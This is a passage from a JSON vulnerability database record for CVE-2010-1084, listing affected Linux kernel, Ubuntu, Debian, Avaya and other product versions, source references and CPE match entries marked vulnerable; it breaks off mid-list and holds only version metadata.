        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "0"
      },
      {
        "model": "desktop video device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "kernel 2.6.34-rc2-git1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel 2.6.34-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura conferencing standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "38898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
